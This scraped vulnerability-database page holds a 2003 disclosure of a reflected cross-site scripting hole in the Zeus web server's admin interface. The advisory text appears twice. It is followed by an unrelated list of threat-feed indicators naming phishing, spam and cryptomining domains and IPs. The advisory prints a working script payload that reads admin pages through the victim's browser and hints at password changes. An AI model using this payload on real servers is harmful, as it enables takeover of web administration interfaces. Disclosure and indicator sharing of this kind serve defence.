This is for IE; for other browsers you may modify this code.
Imagination is the best friend of the attacker. Open your minds: XSS does
not only mean execution of commands on the client side... successfully
exploited, in some scenarios (like web admin interfaces) these bugs can
lead to execution of commands on the server side...
See you,
Hugo Vázquez Caramés & Toni Cortés Martínez
INFOHACKING RESEARCH 2003
www.infohacking.com
Barcelona
Spain
{"id": "SECURITYVULNS:DOC:4610", "bulletinFamily": "software", "title": "Another ZEUS Server web admin XSS!", "description": "\r\n\r\nHi,\r\n\r\n\r\n\r\nanother XSS, now on the ZEUS web admin interface.\r\n\r\nThe tested software is Zeus 4.2r2 (webadmin-4.2r2) on Linux x86\r\n\r\n\r\n\r\nThis is not the same issue as bid 6144 (index.fcgi),\r\n\r\nnow is on "vs_diag.cgi".\r\n\r\n\r\n\r\nExploit is simple:\r\n\r\n\r\n\r\nhttp://<target>:9090/apps/web/vs_diag.cgi?server=<YOUR_CODE>\r\n\r\n\r\n\r\nI have read this post: (http://www.securityfocus.com/archive/1/302961), \r\n\r\nregarding "index.fcgi" XSS.Mr, Colin Watson, claims that XSS bug on their \r\n\r\nsoftware is not a big risk because: "The Zeus Administration Server uses \r\n\r\ncookies to record several items oftransient state: the state of the \r\n\r\nfolding list of groups of virtualservers, and the list of currently \r\n\r\nmonitored variables and machines ifreal-time monitoring is in place. It \r\n\r\ndoes not use cookies to store any security-sensitive information (...)" \r\n\r\n\r\n\r\nWho needs cookies? :-) ZEUS uses "Basic Auth" (base 64 encoded) for the \r\n\r\nsession tracking...but ZEUS does not allow http TRACE method, so we can \r\n\r\nnot run a XST (Cross Site Tracing) against it :-(\r\n\r\nI know litle about client side scripting, but probably there's some way to \r\n\r\nsend POST requests and... change the admin password?, stop the web \r\n\r\nserver?... I'm quite sure there's some way to do this.\r\n\r\n\r\n\r\nWith the script we show below an attacker can do an HTTP request to the \r\n\r\nweb admin interface of the ZEUS and redirect the output... 
\r\n\r\nOf course you have to trick the admin...\r\n\r\n\r\n\r\nhttp://<target>:9090/apps/web/vs_diag.cgi?server=<script>function%20pedo()\r\n\r\n{var%20xmlHttp%20=%20new%20ActiveXObject("Microsoft.XMLHTTP");xmlHttp.open\r\n\r\n("GET","http://<target>:9090/apps/web/global.fcgi",false);xmlHttp.send\r\n\r\n();xmlDoc=xmlHttp.responseText;document.write(xmlDoc);}pedo();alert("Have%\r\n\r\n20you%20enabled%20the%20protection%20of%20your%20ZEUS...?%20We%20can%20rip%\r\n\r\n20this%20info!%20Much%20more%20evil%20actions%20are%20possible...")\r\n\r\n</script>\r\n\r\n\r\n\r\nThis is for IE, for other browsers you may modify this code.\r\n\r\nImagination is the best friend of the attacker. Open your minds, XSS does \r\n\r\nnot only means execution of commands on the client side... succefully \r\n\r\nexploited, in some scenarios (like web admin interfaces) those bugs can \r\n\r\nlead on execution of commands on the server side... \r\n\r\n\r\n\r\nSee you,\r\n\r\n\r\n\r\nHugo V\u0431zquez Caram\u0439s & Toni Cort\u0439s Mart\u043dnez\r\n\r\nINFOHACKING RESEARCH 2003\r\n\r\nwww.infohacking.com\r\n\r\nBarcelona\r\n\r\nSpain", "published": "2003-05-30T00:00:00", "modified": "2003-05-30T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:4610", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:07", "edition": 1, "viewCount": 8, "enchantments": {"score": {"value": 2.7, "vector": "NONE", "modified": "2018-08-31T11:10:07", "rev": 2}, "dependencies": {"references": [{"type": "oraclelinux", "idList": ["ELSA-2020-5654"]}, {"type": "nessus", "idList": ["EULEROS_SA-2020-1457.NASL", "EULEROS_SA-2020-1496.NASL", "EULEROS_SA-2020-1477.NASL", "EULEROS_SA-2020-1491.NASL", "EULEROS_SA-2020-1494.NASL", "EULEROS_SA-2020-1483.NASL", "EULEROS_SA-2020-1489.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562311220201494", "OPENVAS:1361412562311220201431", 
"OPENVAS:1361412562311220201489", "OPENVAS:1361412562311220201457", "OPENVAS:1361412562311220201477", "OPENVAS:1361412562311220201400", "OPENVAS:1361412562311220201491", "OPENVAS:1361412562311220201476", "OPENVAS:1361412562311220201430", "OPENVAS:1361412562311220201473"]}], "modified": "2018-08-31T11:10:07", "rev": 2}, "vulnersScore": 2.7}, "affectedSoftware": []}
{"rst": [{"lastseen": "2021-02-24T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **103[.]28.36.21** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **14**.\n First seen: 2020-12-25T03:00:00, Last seen: 2021-02-24T03:00:00.\n IOC tags: **generic**.\nASN 131353: (First IP 103.28.36.0, Last IP 103.28.39.255).\nASN Name \"NHANHOAASVN\" and Organisation \"NhanHoa Software company\".\nASN hosts 40665 domains.\nGEO IP information: City \"\", Country \"Vietnam\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-12-25T00:00:00", "id": "RST:0930552B-4610-37B6-86F4-F01173C15E44", "href": "", "published": "2021-02-25T00:00:00", "title": "RST Threat feed. IOC: 103.28.36.21", "type": "rst", "cvss": {}}, {"lastseen": "2021-02-24T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **boxberry[.]id097483.ru** in [RST Threat Feed](https://rstcloud.net/profeed) with score **20**.\n First seen: 2020-12-05T03:00:00, Last seen: 2021-02-24T03:00:00.\n IOC tags: **phishing**.\nDomain has DNS A records: 45[.]147.197.110,212.8.245.252,190.115.18.100,87.98.180.6,116.202.0.200\nWhois:\n Created: 2020-12-05 16:42:02, \n Registrar: REGRURU, \n Registrant: Private Person.\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-12-05T00:00:00", "id": "RST:E6DE2D5B-4610-3C66-9BF0-9F300B70622C", "href": "", "published": "2021-02-25T00:00:00", "title": "RST Threat feed. 
IOC: boxberry.id097483.ru", "type": "rst", "cvss": {}}, {"lastseen": "2021-02-24T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **216[.]151.138.62** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **10**.\n First seen: 2019-12-17T03:00:00, Last seen: 2021-02-24T03:00:00.\n IOC tags: **generic**.\nASN 13445: (First IP 216.151.128.0, Last IP 216.151.159.255).\nASN Name \"13445\" and Organisation \"Cisco Webex LLC\".\nThis IP is a part of \"**cisco_webex**\" address pools.\nASN hosts 426 domains.\nGEO IP information: City \"\", Country \"United States\".\nIOC could be a **False Positive** (Cloud provider IP).\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2019-12-17T00:00:00", "id": "RST:F76918EA-4610-30FD-9867-CA90F3FF6414", "href": "", "published": "2021-02-25T00:00:00", "title": "RST Threat feed. IOC: 216.151.138.62", "type": "rst", "cvss": {}}, {"lastseen": "2021-02-23T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **0[.]0.0.0 chat-6.eu.api.binance.com** in [RST Threat Feed](https://rstcloud.net/profeed) with score **48**.\n First seen: 2021-02-23T03:00:00, Last seen: 2021-02-23T03:00:00.\n IOC tags: **cryptomining**.\nDomain has DNS A records: 54[.]95.212.255,54.250.4.108\nWhois:\n Created: 2017-04-01 16:48:33, \n Registrar: unknown, \n Registrant: MarkMonitor Inc.\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2021-02-23T00:00:00", "id": "RST:E72DEA49-4610-3631-B10A-4A76CEEC638C", "href": "", "published": "2021-02-23T00:00:00", "title": "RST Threat feed. 
IOC: 0.0.0.0 chat-6.eu.api.binance.com", "type": "rst", "cvss": {}}, {"lastseen": "2021-02-23T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **0[.]0.0.0 ltc.openvpn.f2pool.com** in [RST Threat Feed](https://rstcloud.net/profeed) with score **48**.\n First seen: 2021-02-23T03:00:00, Last seen: 2021-02-23T03:00:00.\n IOC tags: **cryptomining**.\nDomain has DNS A records: 52[.]1.161.122\nWhois:\n Created: 2013-04-23 04:46:42, \n Registrar: Alibaba Cloud Computing Beijing Co Ltd, \n Registrant: unknown.\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2021-02-23T00:00:00", "id": "RST:6DFAE96D-4610-36EF-83E8-2F450DBE13F0", "href": "", "published": "2021-02-23T00:00:00", "title": "RST Threat feed. IOC: 0.0.0.0 ltc.openvpn.f2pool.com", "type": "rst", "cvss": {}}, {"lastseen": "2021-02-23T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **0[.]0.0.0 stream1-0-6.binance.com** in [RST Threat Feed](https://rstcloud.net/profeed) with score **48**.\n First seen: 2021-02-23T03:00:00, Last seen: 2021-02-23T03:00:00.\n IOC tags: **cryptomining**.\nDomain has DNS A records: 54[.]95.212.255,54.250.4.108\nWhois:\n Created: 2017-04-01 16:48:33, \n Registrar: unknown, \n Registrant: MarkMonitor Inc.\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2021-02-23T00:00:00", "id": "RST:EEDA6BBD-4610-3AE3-ADD8-DB5B24A6835A", "href": "", "published": "2021-02-23T00:00:00", "title": "RST Threat feed. 
IOC: 0.0.0.0 stream1-0-6.binance.com", "type": "rst", "cvss": {}}, {"lastseen": "2021-02-23T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **0[.]0.0.0 wood.suprnova.cc** in [RST Threat Feed](https://rstcloud.net/profeed) with score **20**.\n First seen: 2021-02-23T03:00:00, Last seen: 2021-02-23T03:00:00.\n IOC tags: **cryptomining**.\nWhois:\n Created: 2013-03-16 21:39:15, \n Registrar: unknown, \n Registrant: NAMECHEAP INC.\nIOC could be a **False Positive** (Domain not resolved, but Whois records found).\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2021-02-23T00:00:00", "id": "RST:21AC99C2-4610-3D90-8BBC-0CF84FEB739D", "href": "", "published": "2021-02-23T00:00:00", "title": "RST Threat feed. IOC: 0.0.0.0 wood.suprnova.cc", "type": "rst", "cvss": {}}, {"lastseen": "2021-02-21T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **elisabethtybiwinna[.]in** in [RST Threat Feed](https://rstcloud.net/profeed) with score **10**.\n First seen: 2019-12-15T03:00:00, Last seen: 2021-02-21T03:00:00.\n IOC tags: **spam**.\nIOC could be a **False Positive** (Domain not resolved. Whois records not found).\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2019-12-15T00:00:00", "id": "RST:345F590A-4610-3155-B601-46D15965FF8C", "href": "", "published": "2021-02-22T00:00:00", "title": "RST Threat feed. IOC: elisabethtybiwinna.in", "type": "rst", "cvss": {}}, {"lastseen": "2021-02-18T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **mail[.]joinwacimbrut.grub-invitt-36.gq** in [RST Threat Feed](https://rstcloud.net/profeed) with score **10**.\n First seen: 2021-02-18T03:00:00, Last seen: 2021-02-18T03:00:00.\n IOC tags: **phishing**.\nIOC could be a **False Positive** (Domain not resolved. 
Whois records not found).\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2021-02-18T00:00:00", "id": "RST:3C731B8C-4610-3076-93A4-5623E1CB0CAF", "href": "", "published": "2021-02-19T00:00:00", "title": "RST Threat feed. IOC: mail.joinwacimbrut.grub-invitt-36.gq", "type": "rst", "cvss": {}}, {"lastseen": "2021-02-14T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **lexstonesolicitors[.]com** in [RST Threat Feed](https://rstcloud.net/profeed) with score **10**.\n First seen: 2019-12-17T03:00:00, Last seen: 2021-02-14T03:00:00.\n IOC tags: **generic**.\nIOC could be a **False Positive** (Domain not resolved. Whois records not found).\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2019-12-17T00:00:00", "id": "RST:F00435C1-4610-34C7-BC5A-CECC2AC61E10", "href": "", "published": "2021-02-15T00:00:00", "title": "RST Threat feed. IOC: lexstonesolicitors.com", "type": "rst", "cvss": {}}]}